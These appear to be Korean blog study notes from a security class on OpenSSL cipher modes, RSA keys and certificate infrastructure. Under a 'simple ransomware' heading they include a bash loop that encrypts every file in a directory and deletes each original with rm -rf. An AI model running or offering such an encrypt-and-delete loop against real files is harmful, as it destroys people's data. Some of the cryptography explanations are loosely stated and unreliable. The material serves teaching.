#openssl 암호화
ecb - 블록 암호화 / 순차적으로 암호화 / 한개의 블록만 해독되어도 나머지 블록도 해독
cbc = 가장 많이 사용 / xor연산을 통해 이전 암호문과 연산 / salt 값이 들어가는 방식 / 계속 암호화 대상 값을 변경
cfb = 블록 암호화 스트림 방식 (들어오는 대로 바로 바로 ) / 키가 먼저 들어오면 (재사용)/ "암호화 복호화모두 암호화"
ofb = cfb와 유사 / 암호화 함수는 키 생성에만 사용(최초에만 사용) / "암호화 복호화 통합"
ctr = 1씩 증가 /
aes = 블록 암호화 / 128비트
암호가 틀리면 안나온다
쉽게 하기
탭을 누르면서 하기
# 파일 암호화
#공개키 개인키 만들기
개인키
공개키
암호화 진행
#간단한 랜섬웨어
파일 생성
스크립트 만들기
$(ls/algo/file) = for i in (korea1 korea2 korea3)
스크립트는 절대 경로로
for i in $(ls /algo/file);
do
openssl rsautl -encrypt -inkey /algo/sevas.pub -pubin -in /algo/file/$i -out /algo/file/$i.enc
rm -rf /algo/file/$i
done
====================================================================================
#인증서
certmgr.msc
Wireshark에서 TLS 찾기
버전 1
버전 2
버전 3
#인터넷 인증서 보기
인터넷도구 -> 인터넷옵션 -> 내용-> 인증서 선택 -> 자세히
공개키 기반 구조
Trusted Third Party 디자인
제 3의 기관 (ca)를 통해 인증
KISA에서 인증서 배포
CA = 인증 기관 (KISA)
RA = 등록 기관 (은행)
저장소 공개된 인증서 저장소 인증서 검색기능 제공
인증서 ca에서 확인되 증명서
사용자 user > subject (공개키소유자 인증서 요구 기관 또는 사용자 )
가입자가 많으면 Root Ca 부담이 심해진다
하이라키
이상하다 판단하면
원 상태로 되돌아간다
블록체인 설명
혼합 구조
ca1 한국 ca2 중국 ca3 미국
풀모델
요즘 사용
우리가 알아야하는것
개인키 암호화 방식
키 교환은 무조건 공개키
전자서명은 공개키를 복호화하는 방식으로 사용
# 정리
전자서명은
공개키 복호화 방식
통신은
공개키 암호화 방식
'보안' 카테고리의 다른 글
| 리눅스 DNS Spoofing (0) | 2025.03.05 |
|---|---|
| 리눅스 Switch_Jamming (0) | 2025.03.05 |
| 암호학 & 패스워드 크래킹 (0) | 2025.02.06 |
| 무결성 검사 & Revers & xinet (0) | 2025.02.05 |
| 백도어 (0) | 2025.02.04 |
